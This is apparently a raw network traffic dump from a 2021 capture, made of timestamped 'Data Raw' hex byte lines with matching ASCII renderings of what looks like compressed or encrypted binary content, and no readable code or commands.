                                                                                                                                                                                2021-11-11 11:26:10 UTC4980INData Raw: 10 09 9f 90 2d 0f 2f 4a 0d 20 5c d6 7e 8c 3d 81 8e de 5a f8 26 17 6e fa 0a 98 f1 96 03 e0 e5 53 42 09 28 97 ac c1 da a8 fa 49 59 a3 91 74 9d 73 66 ae 42 92 9d ea 06 f8 b2 7e 3a c0 14 20 ad 0a ca 2a 2c e0 da 24 80 45 6c 83 93 48 e9 2f 69 6d 70 78 a6 c8 5e 90 89 5c 93 c4 6a a8 06 2f dd 93 22 0c 04 95 38 4d fd 11 50 98 6c b6 48 24 40 81 df cf fd 4c 88 24 db 97 44 07 ef 00 91 17 6d 16 3b ca 03 74 51 3e 37 4e cc b6 3c 3d 9f a9 a5 08 df 33 f7 ac be 88 8e 83 10 52 d9 6d 14 10 dc 30 12 af 27 bf 16 1c a8 f6 e6 7c 62 ef b5 f3 22 d5 2a 1e 90 18 c9 19 b8 14 4e 54 88 77 fe 60 73 40 b9 af a6 f2 93 06 0c 70 51 24 c4 59 0f ee 0b 48 24 7d fa b7 12 5d 2b 18 ab f7 b9 18 38 ba 6c a1 be 34 7c c6 98 ec 8f 31 ad 28 cd 92 80 74 09 06 36 5e 63 5c 9d 4b c6 cb e4 27 3c 19 fc 01 40
                                                                                                                                                                                Data Ascii: -/J \~=Z&nSB(IYtsfB~: *,$ElH/impx^\j/"8MPlH$@L$Dm;tQ>7N<=3Rm0'|b"*NTw`s@pQ$YH$}]+8l4|1(t6^c\K'<@
                                                                                                                                                                                2021-11-11 11:26:10 UTC4996INData Raw: 65 8d d3 a4 09 54 a9 f8 3c 18 c9 fc 8a 95 0e 3f c0 40 67 15 83 eb b7 61 1f 18 50 7a bc 3b e3 52 a0 54 78 ff b5 34 a6 23 2d 63 04 5c 78 ff 6c 12 01 6b ae b2 7b 23 36 c8 c2 5d f9 f8 8c 47 7a cc 56 00 87 d4 13 8a 3b 44 1b 6c 03 d8 51 f1 52 c2 fd 72 6d 60 be 2c a1 75 0f 96 c1 64 59 31 c2 20 8a 90 d0 39 fe 86 12 5b 91 14 00 d4 36 a6 8e f0 66 cb 06 5a be 81 c8 a0 e2 00 57 37 a1 02 2a 93 b8 d2 1f 5d d8 3b 20 78 d9 01 47 6d 4d 72 36 05 d6 6e 02 60 aa 7d a2 dd e0 14 e5 a6 09 53 75 a3 1f 02 b8 04 e3 ba fa a0 14 d1 a1 a4 2d a0 e0 0c a7 0c 4a 09 1e 37 1c ba 4b 6b bf 66 2c 5c 30 73 14 18 a2 02 3d ba c8 cb d4 2c 70 e4 0c 52 0c 26 e2 19 ad 0b 60 8f 9c 68 03 25 3f 76 a8 3d 81 57 9d f8 f8 4e 3c 63 04 52 da ba 75 d4 9e 51 54 05 e1 44 ca c6 96 48 6d f5 2c 7f 96 68 09 01 68
                                                                                                                                                                                Data Ascii: eT<?@gaPz;RTx4#-c\xlk{#6]GzV;DlQRrm`,udY1 9[6fZW7*]; xGmMr6n`}Su-J7Kkf,\0s=,pR&`h%?v=WN<cRuQTDHm,hh
                                                                                                                                                                                2021-11-11 11:26:10 UTC5012INData Raw: 60 cb 94 c7 fb 76 c0 0e f3 3c e9 be 7e 96 3d c0 68 0d 9a bf 5e 3b a8 84 ac 68 09 b8 23 ee 5e d7 d1 9a 52 57 7b b7 da db 59 81 68 77 54 87 6f 3e fd 2e a9 4c 6f aa 10 b0 3d 5f f0 68 c7 d3 3a b7 7f 84 ac f3 df 1f de cc 5b fc 65 39 54 f5 85 49 df 9e 15 b7 65 cc c9 57 45 9b eb 7c 90 ec 6e 77 13 91 9f 7f af 94 55 14 09 8a b1 c5 75 01 09 17 2e e2 6d c1 ca d4 eb c5 3a 9d 0d d4 0c fe 00 b8 fa 1c 31 65 74 ab e2 03 4a 56 6e 3f 59 de 8d c0 86 7b db c5 94 14 0b 92 81 80 b7 a0 44 35 40 60 dc 25 83 88 df 46 94 26 ad 7a f1 5d 82 d7 10 dc c1 13 b5 9b a0 c6 62 4f ca d1 76 a5 74 2e c8 55 80 30 17 7b 39 49 7a 22 e2 35 4f 07 b8 5b cc 40 0d 75 00 58 f3 a2 89 b0 5d 7f ca 5e 79 24 83 a2 6c 00 30 5b 95 f1 f4 c9 21 4c 55 12 76 60 84 2c f3 79 3c 92 97 2c 49 87 37 cb 1c 90 77 b0 91
                                                                                                                                                                                Data Ascii: `v<~=h^;h#^RW{YhwTo>.Lo=_h:[e9TIeWE|nwUu.m:1etJVn?Y{D5@`%F&z]bOvt.U0{9Iz"5O[@uX]^y$l0[!LUv`,y<,I7w
                                                                                                                                                                                2021-11-11 11:26:10 UTC5028INData Raw: eb ee df 00 c6 4b 25 10 23 02 e8 ae 17 a2 89 8b 5d 70 18 18 ed f7 31 97 fe 0a 50 b4 67 c0 08 c0 2d 3c 35 19 05 0a 09 4e 86 d4 e8 2a b0 65 d5 a6 5a f4 ba 62 0e 91 f4 42 73 e7 41 ca 36 dc 3f c3 02 68 04 19 95 d4 02 50 aa e6 42 02 bd c2 0b 9a fd 57 d9 32 80 cd bb f0 5c a5 b6 00 05 04 2f db e0 44 d5 3e c0 44 8b d7 83 0f ba 00 e6 f8 e3 72 f3 32 6e d2 30 62 ff 7c b7 69 ab b8 4b 65 b6 12 24 b8 53 04 36 a2 5b c8 fa fc a1 84 31 04 30 e9 87 a3 5a 94 41 08 ae 24 89 05 60 0a 63 04 c6 d2 73 6f d7 81 8a 9e dc 3f dd a6 40 38 22 e9 7f 9a 02 13 bf 4e aa e1 6a 7a 0b 92 ba 32 70 c4 b6 6a 98 86 70 89 be 7c ef 5a bd 5f 8a 38 12 94 7d 61 aa a0 04 7a 6d 92 8a 14 62 19 91 05 c5 ab 9a ec 88 8c 70 19 90 10 55 2b e1 12 5d 01 bf 8a 16 3e c8 16 3d 12 dc 28 bb 17 90 6b 2f af c8 aa 76
                                                                                                                                                                                Data Ascii: K%#]p1Pg-<5N*eZbBsA6?hPBW2\/D>Dr2n0b|iKe$S6[10ZA$`cso?@8"Njz2pjp|Z_8}azmbpU+]>=(k/v
                                                                                                                                                                                2021-11-11 11:26:10 UTC5044INData Raw: c8 02 23 2a dc 6e fe 31 16 b1 14 2c d9 5e 26 65 c4 cc 43 ec 96 74 92 f5 88 3c 9f 61 1a d8 88 ed 63 68 c2 2f fa 1c f2 09 94 d5 e5 2e 53 20 ad e8 fe 8c 8a f2 80 f8 3c b7 18 46 03 49 00 de 16 a7 96 ad 21 6b 72 27 1b 60 8e 0b 22 04 51 e9 e9 1a 9d 68 ca 05 9e 9a dc 26 06 b2 4d d5 08 4e 9f 80 9e 11 2c a0 61 9b c0 d7 03 18 63 66 17 21 06 20 36 97 b5 bc 05 9e 74 2e c1 75 61 a0 1f 3b 80 c8 b3 04 6a 28 18 05 c0 20 ca 2e 15 3a 6e 9e 38 03 d4 d1 17 c1 14 64 57 46 ba 01 1d 81 2e b2 59 e8 80 44 69 55 32 8b 85 51 32 c5 a6 7c dc f8 a6 7e 88 03 e7 83 16 87 67 0b 13 a8 d2 72 f8 31 ac 9e 43 17 8d da 41 89 14 74 c6 d7 96 df f1 c1 ad 0d 64 02 6e 00 fa 73 aa 9c de 2a 75 a4 2d c5 39 d9 ff 82 ff 17 a6 e2 08 88 0c 13 1f 18 06 bf f9 2c 00 6b 35 9e 16 d4 8a c3 e4 9f 60 b1 9d 06 92
                                                                                                                                                                                Data Ascii: #*n1,^&eCt<ach/.S <FI!kr'`"Qh&MN,acf! 6t.ua;j( .:n8dWF.YDiU2Q2|~gr1CAtdns*u-9,k5`
                                                                                                                                                                                2021-11-11 11:26:10 UTC5060INData Raw: 05 bd 1f f2 1d b6 9a 88 25 6d b4 60 9c f9 7d 30 fe c5 4c 22 20 dc 62 31 60 28 98 5e 8c 85 29 39 58 42 c4 04 d8 67 fc 6c 09 26 4a d2 28 29 1d ae b6 04 b6 a5 9f e0 54 d4 02 34 47 65 de 4e 3a f5 c7 23 28 32 0c 69 aa 9d 1c f0 16 72 c5 12 7e d2 93 05 2a 50 31 16 1a 0a d9 48 b4 80 d7 f9 11 ef ca 4a 2d f0 db a2 24 6e dd 89 e6 61 55 21 f8 cf 7a 18 03 0e e3 b0 42 6a 02 bf 54 9c 9a d3 ce e1 db 45 3a 82 b1 c6 ea 35 5d 22 3a 5e 43 44 90 12 96 3e 93 c1 92 fc fb 3a 45 0a bd 80 f4 2c bf 2d 9d 9b 8f 00 ab 7d 11 6e b9 e6 c4 3e 0b b5 7e 6e 1d 20 9a 8a ce 42 25 2d 37 28 f6 e7 7b 80 b0 0c 7b 58 16 e6 1d c9 f6 06 34 f7 b9 1c 2c 14 85 ce c8 9a 00 37 b6 3f 7e 9d 96 3b 63 09 09 e0 66 60 4b 08 a8 44 42 23 b7 18 92 1e 8b 0c 2c 7a 05 75 10 a4 16 55 2e 4c 5f 1e 20 c6 cc 5e 71 bc 30
                                                                                                                                                                                Data Ascii: %m`}0L" b1`(^)9XBgl&J()T4GeN:#(2ir~*P1HJ-$naU!zBjTE:5]":^CD>:E,-}n>~n B%-7({{X4,7?~;cf`KDB#,zuU.L_ ^q0
                                                                                                                                                                                2021-11-11 11:26:10 UTC5076INData Raw: 40 8e 39 a5 85 09 14 27 50 b8 f8 3a 00 f2 49 4a 34 7e c1 20 66 a4 d0 16 33 2f 78 ea 28 80 58 42 83 04 e4 62 89 6b 1a 42 77 de 9d 98 59 70 b2 16 bf 65 58 82 fe d4 2e d5 5f fb e4 30 04 c3 ed e2 56 1f 3c 3f 67 a2 79 08 9b eb 80 7d 12 ea bb 21 0a e7 37 3e e2 4c 38 14 45 ed b0 0e 23 28 a4 0c 41 72 55 02 89 3d 8d 5e 9d 22 1f 47 00 97 14 0e 5d 20 87 1f a5 f7 1a 4c d6 99 ec 53 00 1e a3 5f bd 27 69 85 5d 03 38 16 66 b8 92 01 7c b4 30 46 47 e4 71 81 b1 52 3f 84 96 fd 2e 60 24 e9 88 af 2e 80 da 4e 44 02 68 67 cb a0 a7 92 d8 7e da bc 97 7a 50 5b 94 c0 c0 9c 99 e8 00 1e 26 90 e0 32 07 c0 aa 60 6a 1c 5c 97 9b b8 0b 64 d2 8e a4 5e f4 86 fe 7a 02 fd 2f d7 8f 77 ab a2 55 e7 57 a1 b4 17 54 ec c6 85 03 1a 68 ac 28 8a 44 b2 12 e9 ee 63 e8 48 0e 95 4a c5 a3 e8 40 50 7f 0a 28
                                                                                                                                                                                Data Ascii: @9'P:IJ4~ f3/x(XBbkBwYpeX._0V<?gy}!7>L8E#(ArU=^"G] LS_'i]8f|0FGqR?.`$.NDhg~zP[&2`j\d^z/wUWTh(DcHJ@P(
                                                                                                                                                                                2021-11-11 11:26:10 UTC5092INData Raw: 32 a5 df 0e c9 67 a9 03 05 ef 0a f0 4e c7 2d 15 39 aa 13 7f a2 27 7d 10 c3 4d 3d cd b9 3f 3a 69 60 15 ab 16 6e 22 4b 02 f8 92 a3 74 e4 bf 71 c2 42 27 fa 57 fc ed 58 fe d4 4e 38 f8 72 4a c4 8c ff b7 44 5b 34 26 bc 6e 41 bb 6d 26 87 78 07 40 f4 4c 88 51 04 ea 87 ec 3e 60 97 11 0f 0d 2c 0a 45 ee bf 30 0c 8e f1 7b 00 9d e6 ea 75 d3 85 fc e4 63 4d 20 b2 5f 3b 2c 2e b0 10 9a 86 ad fe 63 19 1e 2c f3 1b 5a 1f 32 1e 81 ba b3 83 fc 4d 78 5e bc 00 0c 80 35 bb a4 d4 65 16 01 e5 33 2c 0f 84 85 28 40 ff e9 89 1f de 66 fd 0c 11 47 c6 16 50 b4 0c 20 c4 5a 6c f0 94 07 10 8c 32 de 62 cc f6 7d 00 8f 83 86 ce 94 20 89 e3 93 0b 6c 4e d4 29 6d 74 b0 02 95 06 68 38 76 68 98 05 25 bf dd 98 0a f2 d9 5c 39 9e 00 2d 2b f0 60 a2 6f 28 c6 1c 62 43 30 4f e5 c9 88 f7 80 33 e4 04 e0 39
                                                                                                                                                                                Data Ascii: 2gN-9'}M=?:i`n"KtqB'WXN8rJD[4&nAm&x@LQ>`,E0{ucM _;,.c,Z2Mx^5e3,(@fGP Zl2b} lN)mth8vh%\9-+`o(bC0O39
                                                                                                                                                                                2021-11-11 11:26:10 UTC5108INData Raw: 68 f4 fe e6 6c 07 45 d7 ca 0a c6 20 d4 38 11 4f 32 27 84 e7 56 ea 16 ae e0 1e 21 7f 50 05 62 fa 58 7f a5 ff 42 62 e5 c8 59 f7 40 00 bb f9 7d 1d 2f d1 e1 7d 1c f2 c1 9c ef e6 0d 0a 40 bc 70 93 8a 79 2b 62 36 10 a8 b3 55 dc 60 51 da 64 02 8e 25 15 4a 54 4e 43 b2 62 04 18 ab 78 f7 fe 00 87 c7 a1 21 45 03 72 83 8b 3e 66 3a ee 1c 0c ba b6 58 41 e4 f0 ff 7d c4 38 6c 4c 36 9e c4 04 ed 5c 04 50 ce ee fc a4 92 d0 e7 fa ae 05 4b 31 bf 61 0a 94 e7 80 98 99 b9 5f 5c dc 6d a0 a0 ed 2e 2c 1e eb c8 a7 80 04 65 73 56 99 fc a6 30 14 59 28 82 28 af 0b 8c db 0d ea 58 3c 4c 06 68 2e 95 d8 65 20 bf 30 94 b0 92 6a 03 9c 68 9b 02 af 3e a8 5f c2 6f 4b 7f ae 29 44 3f c4 48 ea 8b fc 20 5c 04 5b 68 a0 8c ef bf ec 6f 93 eb b7 d7 32 f0 06 c6 57 64 58 27 3f 02 74 cf 02 e2 c8 fe 7a 7d
                                                                                                                                                                                Data Ascii: hlE 8O2'V!PbXBbY@}/}@py+b6U`Qd%JTNCbx!Er>f:XA}8lL6\PK1a_\m.,esV0Y((X<Lh.e 0jh>_oK)D?H \[ho2WdX'?tz}
                                                                                                                                                                                2021-11-11 11:26:10 UTC5124INData Raw: b2 e2 7f c7 eb 44 c0 d3 df b3 30 05 1e ae 3e e6 50 f5 62 2e 4e 36 d4 b2 ab c8 83 0b 00 15 85 78 12 84 db 97 d2 17 24 6c 88 00 de 89 08 dc 19 ed 17 fd 0e 50 20 e8 b7 a9 ca f9 20 7f a8 ea b5 18 52 ec 56 54 bc 34 9f 51 fc 60 a3 ff 11 5e a0 94 7c 1e 16 27 70 a1 b8 ca 15 92 4a 1a 94 4c 85 a1 ec 05 b7 58 7f bf f6 08 0b 97 1d 7b 54 62 00 83 17 ba 2a 85 39 cb e2 2c 76 98 53 04 88 57 78 bd 7e 00 8f 76 17 3a 1a 20 32 a3 9f e2 8c 10 44 c0 b1 71 60 4b ba 80 0e 1c ff 6d 5b cd d5 3c 01 c6 7d e1 28 f3 85 20 15 83 f2 ba c1 d5 ea 14 25 d0 2e 0b 40 8c c0 46 1f eb 2d 5a ed 26 fa 9a 19 08 64 0f 97 d1 00 af 7a ee 1a 33 2f 5a 5b b1 1c 3a ff 68 7e bc 61 8e 10 16 43 fb 2e a7 cc e1 72 ba 07 44 f1 2a 4e f3 08 04 92 07 61 d2 19 18 ce 2a c0 60 5c fc a5 9f 44 2c 0c ef ca c1 11 40 a3
                                                                                                                                                                                Data Ascii: D0>Pb.N6x$lP RVT4Q`^|'pJLX{Tb*9,vSWx~v: 2Dq`Km[<}( %.@F-Z&dz3/Z[:h~aC.rD*Na*`\D,@
                                                                                                                                                                                2021-11-11 11:26:10 UTC5140INData Raw: 42 89 5a de d3 7a 57 b8 02 92 61 3a ff 77 84 d4 02 fc 2d ef 99 d8 21 7a 3a ab 21 45 22 3d ea 60 53 a8 83 77 73 ea ff 72 23 6a 7f 2c 80 16 f5 a6 2a 3e 50 af 5e 7e 85 ea ec 40 fa fd b7 57 ea 09 13 a2 ff 67 bf 2e 7f 80 68 d9 1a ea 7a 97 db 74 72 7f 65 ee 32 40 c5 9a 70 57 b8 02 45 cf 27 fe 7d f1 24 f2 5d cd f0 93 59 09 09 79 75 1f e0 21 93 02 68 b4 8f dd 75 db a8 24 e6 56 95 df 9e c4 46 1c 27 db 55 67 1d 25 f3 da 82 04 8d ed ff df d3 86 4b 5d 4f ee 9c 56 65 c8 9c d0 40 10 e6 73 5e 28 ee 08 91 c2 6c f9 b8 7d 31 ff 2a b8 93 f3 68 b0 1d f7 6f a7 e1 49 ff 65 b8 ac e8 04 18 a2 7f 8c 77 d6 13 65 7e 35 ff 2f d7 08 49 89 e6 d1 33 07 46 31 09 d7 10 b9 e5 a8 72 1d 55 1f 7b 42 75 97 fc 65 7f 9e 03 09 78 22 bf 37 91 12 53 a4 63 11 27 5d b9 c7 6c 17 eb 55 97 22 27 51 36
                                                                                                                                                                                Data Ascii: BZzWa:w-!z:!E"=`Swsr#j,*>P^~@Wg.hztre2@pWE'}$]Yyu!hu$VF'Ug%K]OVe@s^(l}1*hoIewe~5/I3F1rU{Buex"7Sc']lU"'Q6
                                                                                                                                                                                2021-11-11 11:26:10 UTC5156INData Raw: 04 33 09 f0 90 a9 14 d5 40 2f c8 01 44 fc 63 5c 1a 9a 20 8a 04 97 df bb b8 04 18 23 63 be 1b c0 f4 06 cf 3e 1f 1e 12 33 ab d0 8c 70 8d 34 e8 12 d5 1a 0b ba 98 a7 14 7e c3 4b 18 f9 d8 d0 a8 05 55 28 52 7f 00 fa 2d 92 67 70 af 25 34 b9 7d 47 d4 8f 5d b0 c9 0e 00 24 c4 94 8b 44 31 c3 b3 10 8a 9b 3f b7 d9 27 5c 57 96 28 09 e0 01 96 6c d4 b4 e0 d9 cb 6e 11 30 42 08 1c b4 55 15 06 16 aa 1e 89 0b d8 4d d6 d4 0f da 9c 7b 33 4c 20 f2 40 ac 61 2a 1c a4 5b c4 80 0d 1f a8 b6 77 db 62 c1 24 64 83 a9 0e 8b 38 d3 1a d7 23 f6 38 fc 01 e4 3c de ea 1f 42 94 83 84 1c 3b 63 15 18 30 98 05 ac 5d 01 bf c5 cc 82 bf d5 50 e3 94 c4 00 d1 3a ae 35 49 b1 f7 fc b6 1c f8 46 56 80 fc a6 84 9d 42 a0 57 b5 64 08 26 53 02 4f 6f f3 ff 3c c0 28 dd e4 fc ff d6 25 7c 58 00 bc 74 8d 14 28 96
                                                                                                                                                                                Data Ascii: 3@/Dc\ #c>3p4~KU(R-gp%4}G]$D1?'\W(ln0BUM{3L @a*[wb$d8#8<B;c0]P:5IFVBWd&SOo<(%|Xt(
                                                                                                                                                                                2021-11-11 11:26:10 UTC5172INData Raw: 8b 45 18 af 98 f0 75 80 1f e0 00 de ff c2 92 56 57 c7 93 f4 68 01 47 36 9c e1 ec d9 89 20 08 cc 4a fb ec a0 a2 a2 c8 24 32 d1 3e 0d db 70 d7 8c 9b 2c 19 8b b8 d9 73 2b a9 8a a4 2e 84 10 32 ba 08 2a fc ff 6d 3c 18 26 84 00 24 13 34 d6 af f1 61 22 dc fa 45 2d 9b 31 b0 c6 e2 63 78 c4 32 c4 0c d8 1d bd da 1d eb 48 d7 e8 85 6b 53 fa 47 84 04 43 0e 10 01 6f 15 17 ca c6 93 8c 98 88 76 48 0f 17 18 e3 d3 20 f0 0a cd c1 4f 03 a2 3a 84 38 28 41 e0 cb 40 39 01 fe 49 32 4a 3c da db 88 28 c8 f9 2a 98 82 82 13 17 ea e7 bd 56 c0 22 2d bb ac 2c 01 6e ed 1a 04 52 e9 fc 20 f2 a0 60 e8 48 4b e3 c4 09 c0 4c bb 2f 9e 18 b5 00 1f b7 b9 06 19 29 6d 2e b5 80 dc 22 38 4b cd 16 a1 05 c2 b0 d4 45 2d 62 17 65 c6 0a 73 25 50 03 b0 08 16 3f 16 24 ce 40 f4 b4 8c 27 64 ad 73 7e 02 e6 ee
                                                                                                                                                                                Data Ascii: EuVWhG6 J$2>p,s+.2*m<&$4a"E-1cx2HkSGCovH O:8(A@9I2J<(*V"-,nR `HKL/)m."8KE-bes%P?$@'ds~
                                                                                                                                                                                2021-11-11 11:26:10 UTC5188INData Raw: 77 4f 29 e1 d8 5f 7c d9 a4 06 12 e9 a2 ff 4a 50 8e 48 02 b8 2f b9 f3 7f e4 87 1f ba 19 d4 ac c8 4f 9d 29 0c 23 37 2c 99 20 22 49 50 99 3a 39 92 d6 3c a9 78 d2 01 7e 5a 2f 5d 77 20 53 63 00 7f 8b 4b 05 9f de 67 03 98 89 50 2d 07 5a 25 e9 e3 49 68 8c 65 7d 7d 6c 09 85 41 62 7e 02 09 63 a2 5c 14 16 45 05 71 ea d6 fc 87 70 27 a1 19 20 98 57 1b 47 5b 85 09 ea 6b 72 24 08 6a e5 0b 23 08 33 f5 30 24 57 63 68 00 01 9a 0a 7d 3c b9 c7 62 b8 15 60 07 48 1b 12 39 e2 20 52 46 0b 89 26 0e fd 75 c5 ea 1f 14 25 38 cf 7e c3 16 1f 77 02 ab cc 6a e3 4b 01 2c 0b c3 f8 4c 5f aa fa 63 26 43 f9 90 11 8e 30 25 15 c7 4b ad 04 ec fb c0 3c b3 ba d8 06 47 9f 6f 0a e5 28 2f 43 c0 5c 40 b9 28 c6 86 2c dd f6 11 24 e4 16 d0 2f c5 4f ae cf 00 55 99 60 e3 3d 12 77 ef 17 30 61 5b 81 c3 a2
                                                                                                                                                                                Data Ascii: wO)_|JPH/O)#7, "IP:9<x~Z/]w ScKgP-Z%Ihe}}lAb~c\Eqp' WG[kr$j#30$Wch}<b`H9 RF&u%8~wjK,L_c&C0%K<Go(/C\@(,$/OU`=w0a[
                                                                                                                                                                                2021-11-11 11:26:10 UTC5204INData Raw: 8c 83 e3 a7 ef 83 18 70 44 55 ae 09 d4 c4 6d f9 a0 28 42 5f 2a 39 28 5e 9b aa bd c7 8c 82 ea 0f 37 2f 80 a0 de d7 83 5e 31 b8 55 70 2a 49 3e a7 fa 2c 9c e7 69 76 00 17 d0 ee 64 6a f8 69 5c 7e f4 ae e9 bf 96 ec 36 e5 af 53 e0 d3 2a d7 82 47 ee 37 b7 67 63 83 a3 16 dd 3d af 90 04 fd 71 50 96 c5 e1 84 fc 36 4d 3e 78 7a 2d dd f5 1e 42 95 fe 75 5f a5 90 1e e0 2a 2d d7 5d dd 36 c8 25 41 54 f3 19 5a 7c 35 f2 77 1d 02 16 8b ba 68 5f 54 4a 5d fb 2b b4 5a 09 82 c0 d6 9d 82 95 6c 23 1f 30 c7 69 3b e4 ae 77 b5 d0 12 c0 16 f7 3c ca 1a 1d 9d 6c a1 3c e9 fd c8 b3 4e af cf f6 92 fd 6e 72 4b 5e bf 63 1d 52 8c b7 1e 02 68 7c 95 de 7b 79 3e 84 6c 77 4a fa 39 49 0c f2 fa 14 61 fe 19 99 91 bc 31 c1 06 cd 59 3f cd 59 0b 63 c0 68 62 2e fb 6f b7 4d 66 49 5e 44 7e b6 ac 5c 09 a4
                                                                                                                                                                                Data Ascii: pDUm(B_*9(^7/^1Up*I>,ivdji\~6S*G7gc=qP6M>xz-Bu_*-]6%ATZ|5wh_TJ]+Zl#0i;w<l<NnrK^cRh|{y>lwJ9Ia1Y?Ychb.oMfI^D~\
                                                                                                                                                                                2021-11-11 11:26:10 UTC5220INData Raw: 4f f8 dc ce 45 26 f4 2b 06 06 1d 65 c7 38 4c ef c9 03 2c e9 03 89 49 38 14 c3 e0 7c b6 5e 3f 2d c0 b8 e7 3b 61 7c 76 f5 fa 77 56 08 78 bf 0c 72 d7 9f 62 6e 60 6e 09 cc 97 82 f2 bc 5b 7d ee 6e 3c 95 3d 4b 20 08 e7 a5 24 26 03 69 20 39 84 89 c6 f6 44 06 c7 fc 40 0a dd a9 ab 0b ee 2d 46 e0 08 af 98 96 e1 28 00 5e cb 02 2c d3 14 92 55 f2 a8 01 99 d1 1f ef 98 31 2b 78 ae 5a 82 04 a1 86 96 73 0e 12 ff 33 ad 90 3a 29 59 20 13 b2 57 15 4b 2e 16 55 67 b0 28 20 16 75 9c 01 ab cd 4d 2e 30 da 0d 4e 44 d9 ad 60 f8 34 be 15 7a 14 c5 ad 82 16 a2 46 c1 4f d4 d6 e8 3a ed bb 80 1a de 8b f4 83 19 5b 0d c5 59 f5 01 43 bb f0 1a 26 64 f7 48 61 fc b6 01 42 54 31 5e 4f 9c f1 49 b0 1c c0 7c 6b b7 60 70 b4 92 12 f6 42 16 9f af a3 ce 58 60 38 0e e6 ca 43 c0 0c fb f2 3b 73 39 bc a6
                                                                                                                                                                                Data Ascii: OE&+e8L,I8|^?-;a|vwVxrbn`n[}n<=K $&i 9D@-F(^,U1+xZs3:)Y WK.Ug( uM.0ND`4zFO:[YC&dHaBT1^OI|k`pBX`8C;s9
                                                                                                                                                                                2021-11-11 11:26:10 UTC5236INData Raw: 6b 2b d3 71 30 13 ad b8 57 81 41 75 73 2a 07 05 20 05 12 de b3 1f 42 84 a5 72 40 05 2d dd a4 36 98 50 6e 24 ba 10 87 79 0f 2a 27 12 20 7b a6 03 f1 d5 3f 8a 90 51 e0 69 65 f4 2d a7 06 54 75 60 55 b7 1c 02 83 2d 34 dc e0 4b 4d 14 e2 19 f9 87 91 56 a8 62 0a 6c c2 bc f6 64 2c 08 05 42 41 35 0b b3 f9 93 c8 f2 ab 75 99 a5 da 2b f0 a5 2c 00 83 9d 47 f2 91 82 f4 25 4b d3 a5 53 42 f7 75 f6 f4 ad 76 61 80 c2 c1 bf 3e 51 f2 08 66 98 86 b2 40 71 9b 11 56 4f 3f 30 32 cb 5e 40 71 06 02 58 e7 4b ed 66 33 76 ca 17 2e b0 b3 de 25 5c ec 80 61 13 92 ff 83 0c e5 7f 0f 55 44 25 01 f1 1e 15 85 f9 d9 44 81 15 fe fd 76 f6 18 bb a6 30 c3 bc d7 eb 92 97 fe 19 91 a0 05 59 4b 94 cd 20 a8 52 54 a8 42 79 82 3a cc b9 20 6c f7 4c 66 80 a9 d1 84 31 5b 80 ac 55 88 81 14 f8 20 62 0b ca 7c
                                                                                                                                                                                Data Ascii: k+q0WAus* Br@-6Pn$y*' {?Qie-Tu`U-4KMVbld,BA5u+,G%KSBuva>Qf@qVO?02^@qXKf3v.%\aUD%Dv0YK RTBy: lLf1[U b|
                                                                                                                                                                                2021-11-11 11:26:10 UTC5252INData Raw: 0c ff cd 8d 39 0c ec 06 f3 2f 6c f5 37 e8 25 19 e2 ee 50 00 77 bd 41 12 5b 33 c9 86 02 35 f6 3a 22 b8 99 e4 a0 31 0f df 6c 18 c4 2f 32 18 b6 d5 f9 f2 97 92 a1 23 e8 ea 9a 95 c4 0f 08 32 c0 0d 7b 0b b7 80 10 68 ef 6d a4 f8 0c 20 0f d3 13 24 14 5f f8 45 b4 f3 84 00 ca cd 82 24 57 de ef f0 af a6 fe a7 38 9e 06 17 16 10 27 c6 25 9d d9 fc 8b 3c d4 3d 5e c1 b9 27 25 f7 97 0c 2d d5 34 29 3b 23 73 cb e8 75 e6 38 00 93 55 bc 6d 58 68 df 99 0c 74 07 48 11 ec 81 10 1e 8d 31 78 4c cd e0 82 e2 66 a3 23 5c 06 f2 1f 02 54 d3 8e 12 24 71 48 41 19 86 40 7f 01 3f a2 62 f0 08 38 ce 68 82 8d 7e dd 14 05 39 44 12 7c c2 aa 56 73 ab 2c 69 e8 13 d5 de fc bb 70 e5 05 59 c7 06 28 a6 7b 80 da 18 30 1c 27 40 92 f9 96 4f fb 9c 74 47 10 c0 16 df 63 bc 4c f5 04 58 6b e9 7b ed 0b 9c 78
                                                                                                                                                                                Data Ascii: 9/l7%PwA[35:"1l/2#2{hm $_E$W8'%<=^'%-4);#su8UmXhtH1xLf#\T$qHA@?b8h~9D|Vs,ipY({0'@OtGcLXk{x
                                                                                                                                                                                2021-11-11 11:26:10 UTC5268INData Raw: 15 3b d0 14 33 62 b0 00 da e2 7a 42 1a 97 a1 18 1f 0e d4 20 a9 f2 9a 5a 00 74 c3 2a 24 ce 59 2d a6 e4 09 00 13 bd 23 a4 eb 5b b5 74 12 66 4e a7 fd d4 40 92 fd 65 c6 40 90 ba 60 0c 68 93 1f 00 63 a0 9e fe be d4 53 2e 0e 31 82 24 52 77 96 b7 30 01 e1 66 eb 32 34 07 7a 34 c2 2f 6c 12 24 80 99 01 10 45 d1 d9 63 d4 27 38 7c b3 77 e8 d9 33 fe 97 cc 88 04 67 7b e2 c2 02 fb 80 8a 87 f9 6d 62 24 a4 64 3a ff 66 0f ba c4 fd ee f0 28 b7 5b d2 00 c7 5c dc 3e 92 84 80 6c ca c6 f4 9c f9 78 0c 75 86 bf 9b 7c 3e 12 5b ab 32 91 70 c2 bc 2a 91 68 20 d0 40 dc d7 03 6e 5b 79 a4 d4 fd 2d 85 a0 c1 50 66 fa 80 b2 19 4c 05 6e 98 12 26 0a 9f 8c 80 a0 7c 7e 62 8b a7 63 7d 14 d3 17 06 b4 47 4f 4b 42 44 71 a4 97 74 01 4c ac 3e 40 e0 ef 04 03 26 22 8d c2 ec 88 b2 e3 61 ac 88 4a b4 74
                                                                                                                                                                                Data Ascii: ;3bzB Zt*$Y-#[tfN@e@`hcS.1$Rw0f24z4/l$Ec'8|w3g{mb$d:f([\>lxu|>[2p*h @n[y-PfLn&|~bc}GOKBDqtL>@&"aJt
